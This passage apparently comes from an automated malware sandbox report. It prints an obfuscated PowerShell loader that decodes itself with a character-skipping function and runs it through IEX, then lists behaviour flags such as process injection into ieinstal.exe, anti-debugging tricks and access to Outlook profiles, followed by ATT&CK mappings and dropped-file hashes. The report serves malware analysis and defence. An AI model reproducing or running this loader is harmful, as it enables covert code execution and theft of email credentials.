P8Pr8La8Sl4 TFUdFLyESpD CCGuA SDHu0He9My7 b9Ko6FuF C9 M8Wa8Ve8 C4 fFBoF UEMoDAmC SAOmDPu0Ut9 s7Pi9Me6UsF M9 T8 V8 U8 n4DiF NFJeE SDPlC EA SD E0 S9Ni7Ov9Sp6PrFCr9Sh8De8 G8 S4beFgaF HE TD CC SA HDFo0 t9 B7 P9da6 NF a9Li8Co8Br8 s4TuFRgFSmE fDDeCPhA SDFi0Ph9 F7Co9 T6 BF P9Ny8SnDSv8 E4 I8VaCDeFBeF KETeD OCAsA ODDe0Re9He7Ov9Ra6AzF P9 O8 ND H8BrD F8DrDEx' G) U;Fo&Ma(St`$CoEKvc BhKooLil RoBocMeaLstUdeEd7 R)Ta Re( RTFrr CkMuiArsNntLeeDerBa0 H4Dy B' M8Up0 mF T6BiC F1UrC KAFrCCaB SD c1HaC CACoC F7 ACPi1moCRe0 I8Bi4 E9 P9ge8Po4 GF vFGuFJu7 MDCiD tD S7 ID P0 GC e1 ICSp9 B8WoA BFPo6BoDVe1ThCAtA GD R0 sC PDMiCBo9 RCBr1 N8CoATuEBiD AC MARaD T0SeC t1PhD S6ClCSeBEnD B4 FFma7SlC F1ruDPl6KaDEa2 BCCiD BC A7UmCIs1 AD T7 b8LiA SEAt9 RCUn5raDmu6StDEk7 SCOmCJuC G5AdCNo8CyFIn9 R9InEse9TiEAkENa3AfC P1BeDPr0EnE B0BoCNo1 PCfo8 AC M1InCSk3KhCSt5PoD R0 SCFy1SpESk2 ACCyBVeDca6ViEBl2OpD U1OpCPoA UC S7 NDSi0 PCPeD sCOlBSkC SA MFKl4 VCPlBJaCViDSoC SA ODMi0 tC P1 SD J6Nu8PhCAf8 FC DC M2 BC IF GDCo4Me8Fo4Am8fo0 IETa1 GCFa8BoC B5trDBa7huDBi0DeCco5 CD T7 WCve1NoD B7Mo8du4 K8Dy0 TEUn1MuC B7OvC UCAfC KBUnCGe8ReCUnB FC D7 SCSt5FuD B0BrC M1 S9De2An8poDRy8do8Za8Ka4 v8 HCLeEfo3 KESv0 PFSp0 U8 U4 ZETa4Am8MaCPhF BFBaECoDInCFoA TDAn0Om9Pa7Un9gl6 eFEx9 P8Sq8 B8Fr4KrFToFAfE MDPhCOpAtiDBi0Hu9La7 F9 S6BaFGr9Di8 N8Ga8Su4 SFReFFiEUpD UCVeAUsDPe0an9Ud7Af9Kn6 TFAn9 P8 B8 N8Bo4LuFPaFprE LDHaCBlANoD J0An9Ku7 P9In6 MFAf9Ob8Th8 L8Ve4 DF CFPrE pD GCOpA ADKa0Ku9 S7No9 S6TiF M9Id8 GDMi8Es4Bo8InCFoF MFTeE RD vC UA HD L0 SF T4HeD S0KoDHa6BeF I9Ku8ReDCa8 EDDi8 CD A'Ma)ca;Fu&Tr(So`$ HEGecmahOro MlLyoUdcPaaIltphe X7Lu)Li L( FT Dr SkMeiPlsGit Je Gr S0 P4 S Tr' R8 C0EnFSt1 DDMa7 PD B0voCVa5 TCTr6SoCReDPlC N8 SC G1 M8 F4Bu9 A9 V8Un4 S8 S0ShESp6 LCBe5PrCOpADiC pFLaC H1viDMo6 MDIl7Ko8unABeE GDUdCTiA gDZi2 GCCaB MCReF BCIn1 P8OuCHo8Ge9 D9Tu5 E8en8 E9 V4Gu8 A8 D9 I2Su9 P0Ye8La8Ja9Au4Nv8 I8In8 M4 V9 I0 B9Op6sy9Un7Fl9Ov5Ly9BaDGa9siCSk9 s3 f9 A6Ta8Po8 S9 A4 E8frDOr'Co)lr;Ap& R(Ta`$poE Fc Oh PoSilOnoAmc KaRit Be B7Pr) T N(FaTSer SkCoiMrsBet TeOtr B0St4 S Dr' R8 A0InFTr4AdDPa6ToCNoB aC T7PsC L5 JDSk0GrC B5slCDi8SaCSk1SoDTr4 CD C7HeCSyDOpDHj7 U8Po4Ne9At9Ch8 S4Vi8sk0JuFOp6 HCOr1SpCNiAFoCViB SDSt1UnCCyAEnC L7SkCdi1 TC S0Va8 UA CE NDKaCMiAtuDfe2 CC KBSpCSlFCrCLu1Ro8FoCWi8gu0FjFIn1 cDOp7 BDLa0TiC F5OmCFl6TrCTiD HCPy8FaCLa1 F8Po8Ru9ve4FoF UCSu9He6Uc9Th6 J8Ge8 A9Ma4Se8Ko8 U9Ka4Te8Sh8 M9 P4Af8BiD Y'Ur)Di; R`$OtUEfgBoe MsUnt Ke Cm Pp BlToi Dn FgUveHenfusNo2en= m`"""Tr`$ LeNon Av M: ATSaESuMBlPNd\ THCoe StAneFarInoCik Ka Fr PyBaoPltShiGacSt\IsKToa BtHae Ag So srRuiKms Ietrr BiOvnUng JeMorAsnDye Fsmu. MsAnprah R`""" N;Be& f(An`$PeE KcZah Fo pl Vo Nc MaPutLye U7 R) P T( ITStrvikOsi Ns HtPre MrUn0Br4Tu Li' I8 F0 SERh7 UCNoBmyCFoABiC V7RvDEn6PeC s1GrDbo7 dCAc7 KCKr1MoC DA MCSp7SeCbe1Fo8Ca4 O9Sp9tr8Co4CoFReF KF U7 PDBoD FDFo7 sDMi0UnC H1AgCUn9Sp8StA PEPiDKrELaBSh8 HAHyEMa2FoCLoDInCSk8 vC F1peF T9 F9HeE B9 RE UFAg6 FC S1 PCme5BeCGr0seEKo5 KCSk8 EC V8 REKo6KaDLeDInD A0StCKa1KoD H7Ju8 ACIn8Be0muFSk1 PCBr3IcCUd1 BD P7StD M0ImC H1FoCSt9ApDha4 MC O8 VC OD FC SA BCSh3 SCOv1RvCSaA KDDa7 s9Ka6 K8MuDCa'Kl) P; E`$ FdCae Mf ti Fn Bi OtGli MoRun UsDifTaisclRe=li`$ VCumo Dn UcPrrPle SsSwc Be UnPecSyeNo.PecLeoBuuTln OtGa- F1 C0Ta2 R4Ti; G& P(Re`$EvELicBuh RoLol VoGicBea GtHyeGa7Ue)Co Sa( UTAar AktoiRmsNatReeDer A0 I4pi Sj' PF EF EF e7moDMeD PDpa7 KD S0AfCOp1AlCbe9 B8GeADaF M6DyDNy1 LCChAgeD U0 BC FD CC Y9UdCSe1 P8PaA UEAbDErCstAUnDSe0SkC L1SpDIn6SeC IBOvD D4 RFVi7BlC A1 RDMo6DiD H2tiCemDGiCEr7 FCLe1 NDSk7Me8 LAVaE S9EmC N5RaDOt6BeDNo7 PCViCReC L5 SCAf8 LFDr9Ga9 SECo9 SE SEfo7 EC KBKoDAt4 sDDaDsp8 TC E8 D0piE B7CaCNoB CCBlA BC S7KrDSk6 AC L1 HD V7BuC M7 SC L1JeCNoAVaCTr7FoCSt1De8In8 Z8Fi4Cr9va5 B9So4An9Un6Ja9 c0Ap8He8Tr8Pr4 I8Ra0RaF P4PoDAn6 TCMeBSuC H7 LCEr5BeD F0WiCFo5 NCre8 MCFl1DyDHa4AdDTa7 GCGeDGrDWo7Se8 F8Do8 D4Co8Up0ToCMo0HiCNa1VeCGr2 NC CDswCPeAkaCBeD pD P0CaC BD tC BBArCRyAAdD S7HaC m2UnCStDPeCRu8af8 ID L' R)El;Bl& f( N`$ NEWacArh VoPalUnoVic Da Vt LeSc7 H)Ti T( PT SrSpk RiKrsgat seSkrUs0be4Om Fo'Pe8 M0JeEIr1 TC dA sD C0 XCSeBSlD C4 tD h6afCShBnoCAn7saDfl0 SC X5Br8We4Ak9 T9 F8Hu4UpFIoFDeFSo7 RDKoD LD T7DoDTi0 MCMo1FoC V9ad8 CAAfFUn6 cD I1FoCFrAOrDJo0 FC MDMiCUd9TyCSw1St8 AAAnEboDPrC AA UDPu0 UCSp1 KDKl6TiC CBKrDhu4 AFHa7 SCOm1piD E6PaD Y2 NC SD HCBi7 MC S1 FD t7 S8 GAAaECh9 CC E5GoD I6 SDSu7SkC KC HCFr5PeCAm8 PF M9af9 CE W9LsECrE B3HoCFi1 ID l0HoE C0HaC L1SpCSv8CoCot1PoCIn3JoCVa5 FD C0CaCGo1GuE A2 MC CBTyD R6 PE R2VeDHu1InC CA EC F7UnD N0BeCCaD WCTaB ICEeA SF C4DiCJeBPoC FD MC NAPeDVo0SpCNa1 FD L6 G8 BCUd8SvC ACFr2 PC SFUnD B4Af8Gr4 M8 B0 IEin1WiC S8ChCPr5InDMa7 ADIn0FoC F5OuD A7RoCPr1ArDNe7 p8 c4 F8Tr0PaELi0LaCduDSpDSa7AfDPy4PrC VB LD P7KaC LDNaDVr0ArC VDSoCarBBoC SADaD A7 OD A4 ICGo8 TCBl5QuCSaATvDAk7 O9 s5Fi9 G1pr9Ni2In8 SDAm8An8Ba8Va4Op8haCfoESu3 ME A0DeFLy0Mi8 g4 IEFl4Uh8BaC VFDiFThEAfDHkCOvACoD C0 LF O4 SD s0HaDAn6 bF J9Pu8Ul8 D8Bo4 FFGaF SE aDFoCStADeDAl0 GFGe4TrD G0 HD T6 MFSk9 O8Dr8 S8 t4TiFNoFStE RD UC NAdiDCh0SmFAp4elDMe0UnDSt6 FFOs9 S8 fDWe8Ko4Sp8 SC BFSnF FEScD KCEtA DD S0MuFDe4 ODOn0 PD I6 BFVa9 U8hjDHe8 ED A8EtDGe'Ap) S;Ek&sk(Ta`$OpESkc LhSto UlOfoAncdaaVetIne V7 B)Un T(LaT Fr ckovi Ss RtKneNvr E0 A4 K Ma'Ma8 T0 NE R1frCCoA SDMu0 FC SBMeDUl4 FD D6 RCDiBSkC D7 JD S0MiC c5 A8 UA RE UD TC NAStD U2 LCYsB BC IFSkC L1Sp8 ACCa9Ps4El8 Y8Ve8 U0HyFku4VaD E6FoC MB TCGi7 HC R5 PDGu0UnC R5 UC U8MaC R1 FD T4 lDRa7 SCHeDCoD M7St8 A8Co9Wo4Mi8 BDAu'Si)Sa#Qu;""";Function Forfatningsrettigheds9 { param([String]$Termokandes); For($Rger=2; $Rger -lt $Termokandes.Length-1; $Rger+=(2+1)){ $Trkister = $Trkister + $Termokandes.Substring($Rger, 1); } $Trkister;}$Agennesis0 = Forfatningsrettigheds9 'WeIGlE BXbu ';&$Agennesis0 (Forfatningsrettigheds9 $Resocialiseringsinstitutionerne);<#Svingene Andelsgaardenes Heracleopolite Limers #>;"
    3⤵
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      Checks QEMU agent file
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:320

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Dybene.Deb

Filesize
19KB

MD5
0d80876312ed78dcafe26b3925edc042

SHA1
2b37657fa8a8ff22b41f0e602f1945030f512e92

SHA256
41a2d5d8f60b4e355901a5c704e3f71f45e684bdbcef556433e911a82f025c79

SHA512
0fa4688cafcdea2f95b81010cffef8e34721b083e018596662f4f2af776bd59ecf16d1a20a37adcd3c1f8770ae2d215782f00162ef904987dc36bcffcb8947e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Kategoriseringernes.sph

Filesize
270KB

MD5
795fc3047fc71e348408d6b89097d390

SHA1
23bf7d838a50fdd00792dd5e193bed670aab7c95

SHA256
7e37a3c7cd7821504b13d4a332f587125dfe16785b4b058de651ee48cd0b8a41

SHA512
4bd6965898c7497aea63a263b25c35d79cabe6a3531a1cc495833d66b5c7d73c1007390b66af91197477c75e30d693ca67993aebd8f76d0b8c748bf176e405f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UG87AYWQHOPSQ74QUHZH.temp

Filesize
7KB

MD5
71c38832f660b3ae36b4ca1134a26387

SHA1
b67291ee051e3edd4b6b34c749581735caf1f078

SHA256
cfb213c16ff969dbf96baae40df3ed68bb9efb0208eae6a7c6bd6f614cf8e76c

SHA512
0695dffdbb9c513417f5c9beac234c0dac57ec6ab2697f8ff56e2dc69c27bb65e32225434725d814dc640a7bb016965bf4a53f0a9b40c3c0e20d18af0182e77c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
71c38832f660b3ae36b4ca1134a26387

SHA1
b67291ee051e3edd4b6b34c749581735caf1f078

SHA256
cfb213c16ff969dbf96baae40df3ed68bb9efb0208eae6a7c6bd6f614cf8e76c

SHA512
0695dffdbb9c513417f5c9beac234c0dac57ec6ab2697f8ff56e2dc69c27bb65e32225434725d814dc640a7bb016965bf4a53f0a9b40c3c0e20d18af0182e77c

Download Submit
memory/320-68-0x00000000010D0000-0x000000000392C000-memory.dmp

Filesize
40.4MB

Download
memory/320-69-0x00000000010D0000-0x000000000392C000-memory.dmp

Filesize
40.4MB

Download
memory/320-70-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/320-94-0x00000000010D0000-0x000000000392C000-memory.dmp

Filesize
40.4MB

Download
memory/320-95-0x00000000010D0000-0x000000000392C000-memory.dmp

Filesize
40.4MB

Download
memory/320-97-0x00000000010D0000-0x000000000392C000-memory.dmp

Filesize
40.4MB

Download
memory/2020-59-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/2020-60-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing